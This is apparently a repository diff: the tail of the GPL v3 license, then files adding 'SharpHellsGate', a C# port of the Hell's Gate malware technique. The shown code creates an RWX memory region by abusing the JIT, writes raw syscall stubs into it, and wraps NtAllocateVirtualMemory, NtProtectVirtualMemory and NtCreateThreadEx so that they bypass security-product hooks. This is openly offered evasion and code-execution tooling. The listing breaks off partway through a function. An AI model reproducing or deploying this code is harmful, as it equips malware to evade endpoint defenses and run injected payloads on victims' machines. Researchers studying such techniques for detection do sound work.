License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
|
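--- /dev/null
+++ b/[path not on page] README.md
@@ -0,0 +1,11 @@
+## C# Hell's Gate ##
+C# Implementation of the Hell's Gate VX Technique
+<br />
+<br />
+Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
+<br /> PDF also included in this repository.
+<br />
+<br />
+Link to the original C implementation: https://github.com/am0nsec/HellsGate
+<br />
+<br />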
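--- /dev/null
+++ b/[path not on page] SharpHellsGate solution file
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30114.105
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHellsGate", "SharpHellsGate\SharpHellsGate.csproj", "{F6A46854-FDC2-4F27-9051-5C7BE8E68733}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {CA2A2F5F-A135-4771-A014-A6F2C0D24538}
+	EndGlobalSection
+EndGlobal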
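--- /dev/null
+++ b/[path not on page] HellsGate.cs
@@ -0,0 +1,278 @@
+using System;
+using SharpHellsGate.Win32;
+using System.Runtime.InteropServices;
+using System.Collections.Generic;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+
+namespace SharpHellsGate {
+
+    /// <summary>
+    /// Main implementation of the Hell's Gate technique.
+    /// Responsible for generating a RWX memory region, inject and execute system call stubs.
+    /// </summary>
+    public class HellsGate {
+
+        /// <summary>
+        /// Used to check if the RWX memory region was generated.
+        /// </summary>
+        private bool IsGateReady { get; set; } = false;
+
+        /// <summary>
+        /// Used as for mutual exclusion while injecting and execution of the system call stub in memory.
+        /// </summary>
+        private object Mutant { get; set; } = new object();
+
+        /// <summary>
+        /// 
+        /// </summary>
+        private Dictionary<UInt64, Util.APITableEntry> APITable { get; set; } = new Dictionary<ulong, Util.APITableEntry>() { };
+
+        /// <summary>
+        /// Address of the managed method that was JIT'ed.
+        /// </summary>
+        private IntPtr MangedMethodAddress { get; set; } = IntPtr.Zero;
+
+        /// <summary>
+        /// Address of the RWX memory region after JIT compiling the managed method.
+        /// </summary>
+        private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero;
+
+        /// <summary>
+        /// This function will be JIT at runtime to create RWX memory region.
+        /// </summary>
+        //// <returns>Gate returns either STATUS_SUCCESS or an error status code.</returns>
+        [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
+        private static UInt32 Gate() {
+            return new UInt32();
+        }
+
+        /// <summary>
+        /// Inject in memory a basic system call stub and return a delegate for execution via un-managed code.
+        /// </summary>
+        /// <typeparam name="T">The desired delegate Type.</typeparam>
+        /// <param name="syscall">The system call to execute.</param>
+        /// <returns>A delegate of to execute the system call.</returns>
+        private T NtInvocation<T>(Int16 syscall) where T: Delegate {
+            if (!this.IsGateReady || this.UnmanagedMethodAddress == IntPtr.Zero) {
+                Util.LogError("Unable to inject system call stub");
+                return default;
+            }
+
+            Span<byte> stub = stackalloc byte[24] {
+                0x4c, 0x8b, 0xd1,                                   // mov r10, rcx
+                0xb8, (byte)syscall, (byte)(syscall >> 8), 0x00, 0x00, // mov eax, <syscall
+                0xf6, 0x04, 0x25, 0x08, 0x03, 0xfe, 0x7f, 0x01,     // test byte ptr [SharedUserData+0x308],1
+                0x75, 0x03,                                         // jne ntdll!<function>+0x15
+                0x0f, 0x05,                                         // syscall
+                0xc3,                                               // ret
+                0xcd, 0x2e,                                         // int 2Eh
+                0xc3                                                // ret
+            };
+
+            Marshal.Copy(stub.ToArray(), 0, this.UnmanagedMethodAddress, stub.Length);
+            return Marshal.GetDelegateForFunctionPointer<T>(this.UnmanagedMethodAddress);
+        }
+
+        /// <summary>
+        /// Managed wrapper around the NtAllocateVirtualMemory native Windows function
+        /// </summary>
+        /// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
+        /// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
+        /// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
+        /// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
+        /// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
+        /// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
+        /// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
+        private UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) {
+            lock (this.Mutant) {
+                Int16 syscall = this.APITable[Util.NtAllocateVirtualMemoryHash].Syscall;
+                if (syscall == 0x0000)
+                    return Macros.STATUS_UNSUCCESSFUL;
+
+                DFunctions.NtAllocateVirtualMemory Func = NtInvocation<DFunctions.NtAllocateVirtualMemory>(syscall);
+                return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
+            }
+        }
+
+        /// <summary>
+        /// Managed wrapper around the NtProtectVirtualMemory native Windows function.
+        /// </summary>
+        /// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
+        /// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
+        /// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
+        /// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
+        /// <param name="OldAccessProtection">Receive previous protection.</param>
+        /// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
+        private UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection) {
+            lock (this.Mutant) {
+                Int16 syscall = this.APITable[Util.NtProtectVirtualMemoryHash].Syscall;
+                if (syscall == 0x0000)
+                    return Macros.STATUS_UNSUCCESSFUL;
+
+                DFunctions.NtProtectVirtualMemory Func = NtInvocation<DFunctions.NtProtectVirtualMemory>(syscall);
+                return Func(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, out OldAccessProtection);
+            }
+        }
+
+        /// <summary>
+        /// Managed wrapper around the NtCreateThreadEx native Windows function.
+        /// </summary>
+        /// <param name="hThread">Caller supplied storage for the resulting handle.</param>
+        /// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
+        /// <param name="ObjectAttributes">Initialized attributes for the object.</param>
+        /// <param name="ProcessHandle">Handle to the threads parent process.</param>
+        /// <param name="lpStartAddress">Address of the function to execute.</param>
+        /// <param name="lpParameter">Parameters to pass to the function.</param>
+        /// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
+        /// <param name="StackZeroBits"></param>
+        /// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
+        /// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
+        /// <param name="lpBytesBuffer"></param>
+        /// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
+        private UInt32 NtCreateThreadEx(ref IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) {
+            lock (this.Mutant) {
+                Int16 syscall = this.APITable[Util.NtCreateThreadExHash].Syscall;
+                if (syscall == 0x0000)
+                    return Macros.STATUS_UNSUCCESSFUL;
+
+                DFunctions.NtCreateThreadEx Func = NtInvocation<DFunctions.NtCreateThreadEx>(syscall);
+                return Func(ref hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
+            }
+        }
+
+        /// <summary>
+        /// Managed wrapper around the NtWaitForSingleObject native Windows function.
+        /// </summary>
+        /// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
+        /// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
+        /// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
+        /// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
+        private UInt32 NtWaitForSingleObject(IntPtr ObjectHandle, bool Alertable, ref Structures.LARGE_INTEGER TimeOuts) {
+            lock (this.Mutant) {
+                Int16 syscall = this.APITable[Util.NtWaitForSingleObjectHash].Syscall;
+                if (syscall == 0x0000)
+                    return Macros.STATUS_UNSUCCESSFUL;
+
+                DFunctions.NtWaitForSingleObject Func = NtInvocation<DFunctions.NtWaitForSingleObject>(syscall);
+                return Func(ObjectHandle, Alertable, ref TimeOuts);
+            }
+        }
+
+        /// <summary>
+        /// .ctor
+        /// </summary>
+        /// <param name="Table">The API table that will be used by the multiple function wrapers.</param>
+        public HellsGate(Dictionary<UInt64, Util.APITableEntry> Table) {
+            this.APITable = Table;
+        }
+
+        /// <summary>
+        /// JIT a static method to generate RWX memory segment.
+        /// </summary>
+        /// <returns>Whether the memory segment was successfully generated.</returns>
+        public bool GenerateRWXMemorySegment() {
+            // Find and JIT the method
+            MethodInfo method = typeof(HellsGate).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic);
+            if (method == null) {
+                Util.LogError("Unable to find the method");
+                return false;
+            }
+            RuntimeHelpers.PrepareMethod(method.MethodHandle);
+
+            // Get the address of the function and check if first opcode == JMP
+            IntPtr pMethod = method.MethodHandle.GetFunctionPointer();
+            if (Marshal.ReadByte(pMethod) != 0xe9) {
+                Util.LogError("Method was not JIT'ed or invalid stub");
+                return false;
+            }
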